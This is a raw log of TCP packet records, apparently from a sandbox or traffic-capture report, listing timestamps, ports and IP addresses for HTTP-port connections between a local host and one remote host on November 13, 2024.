Nov 13, 2024 09:28:51.802445889 CET  80  59114  38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:51.802505016 CET  59114  80  192.168.2.4  38.47.237.27
Nov 13, 2024 09:28:51.802592039 CET  80  59114  38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:51.802640915 CET  59114  80  192.168.2.4  38.47.237.27
Nov 13, 2024 09:28:51.829184055 CET  80  59114  38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:51.829207897 CET  80  59114  38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:51.829371929 CET  59114  80  192.168.2.4  38.47.237.27
Nov 13, 2024 09:28:52.064184904 CET  80  59114  38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:52.064286947 CET  80  59114  38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:52.064297915 CET  80  59114  38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:52.064313889 CET  80  59114  38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:52.064342976 CET  80  59114  38.47.237.27  192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064363956 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064377069 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064373016 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.064373016 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.064461946 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.064563036 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064615011 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.064708948 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064718962 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064730883 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064742088 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064764023 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064769030 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.064788103 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064789057 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.064843893 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.065210104 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065221071 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065232038 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065243006 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065263987 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065269947 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.065275908 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065299034 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065304041 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.065325975 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.065787077 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065798044 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065808058 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065829992 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065834999 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.065854073 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065855980 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.065876961 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065886021 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.065927982 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.069386959 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.069466114 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.069478035 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.069530964 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.069653034 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.069710970 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.069740057 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.069796085 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.069807053 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.069848061 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.069951057 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.069962025 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.069972992 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.070003033 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.070035934 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.070681095 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.070739985 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.070750952 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.070794106 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.070895910 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.070908070 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.070919037 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.070955038 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.070988894 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.071697950 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.071708918 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.071718931 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.071767092 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.071815968 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.071827888 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.071839094 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.071876049 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.071908951 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.072581053 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.072650909 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.072663069 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.072710037 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.072753906 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.072765112 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.072773933 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.072810888 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.072844982 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.073586941 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.073597908 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.073606968 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.073643923 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.073734999 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.073745012 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.073755026 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.073780060 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.073813915 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.074410915 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.074474096 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.074484110 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.074611902 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.074624062 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.074634075 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.074639082 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.074675083 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.074675083 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.075371027 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.075437069 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.075447083 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.075490952 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.075586081 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.075596094 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.075604916 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.075640917 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.075675011 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.076296091 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.128648043 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.153424025 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.153479099 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.153491020 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.153584957 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.153624058 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.153636932 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.153698921 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.153779984 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.153841972 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.153856039 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.153870106 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.153922081 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.154037952 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.154048920 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.154059887 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.154095888 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.154679060 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.154735088 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.154735088 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.154750109 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.154797077 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.154897928 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.154908895 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.154920101 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.154951096 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.155591011 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.155646086 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.155670881 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.155682087 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.155754089 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.155858994 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.155872107 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.155881882 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.155910969 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.156555891 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.156574011 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.156590939 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.156611919 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.156646013 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.156789064 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.156800985 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.156811953 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.156843901 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.157459974 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.157512903 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.157543898 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.157555103 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.157618046 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.157718897 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.157731056 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.157742023 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.157773018 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.158427954 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.158482075 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.158507109 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.158518076 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.158559084 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.158655882 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.158667088 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.158679008 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.158710003 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.159338951 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.159399033 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.159406900 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.159420013 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.159459114 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.159574032 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.159585953 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.159595966 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.159627914 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.160300016 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.160357952 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.160363913 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.160377026 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.160424948 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.160510063 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.682526112 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.682544947 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.682564020 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.682575941 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:55.209733009 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:56.230909109 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:56.235821009 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.236023903 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:56.243518114 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:56.248471022 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.248481035 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.248493910 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.248500109 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.248507977 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.248687029 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.248701096 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.248708010 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.248711109 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.905841112 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.905881882 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.905920029 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.905993938 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.906011105 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.906065941 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:56.906162024 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.906198025 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:56.906205893 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:56.906215906 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.906346083 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.906394958 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:56.906404018 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.906419039 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.906464100 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:56.910883904 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.910953999 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.910972118 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.911006927 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:56.911048889 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.911087036 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:56.938030958 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.938045025 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.938172102 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.024629116 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.024831057 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.024847031 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.024862051 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.024878025 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.024919987 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.024956942 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.025000095 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.025058031 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.025058031 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.025058031 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.025058031 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.025156021 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.025295019 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.025310040 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.025348902 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.025388002 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.025441885 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.025623083 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.025722027 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.025738955 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.025772095 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.025871038 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.025887966 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.025924921 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.026329994 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.026385069 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.026405096 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.026422024 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.026468992 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.026567936 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.026585102 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.026631117 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.065869093 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.065886021 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.065901995 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.066030025 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.066046000 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.066092014 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.066092968 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.113087893 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.143372059 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143404961 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143423080 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143436909 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143452883 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143469095 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143485069 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143768072 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143798113 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143834114 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143855095 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143873930 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143938065 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.144088984 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.144114971 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.144145966 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.144252062 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.144320965 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.144336939 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.144370079 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.144370079 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.144510031 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.144568920 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.144577980 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.144596100 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.144654036 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.144761086 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.144778013 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.144793987 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.144833088 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.145009041 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.145025015 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.145064116 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.145375967 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.145445108 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.145461082 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.145478010 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.145530939 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.145654917 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.145672083 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.145688057 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.145726919 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.145900011 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.145916939 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.145955086 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.146280050 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.146337032 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.146352053 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.146368980 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.146425009 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.146545887 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.146563053 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.146578074 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.146594048 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.146620989 CET5911680192.168.2.438.47.237.27
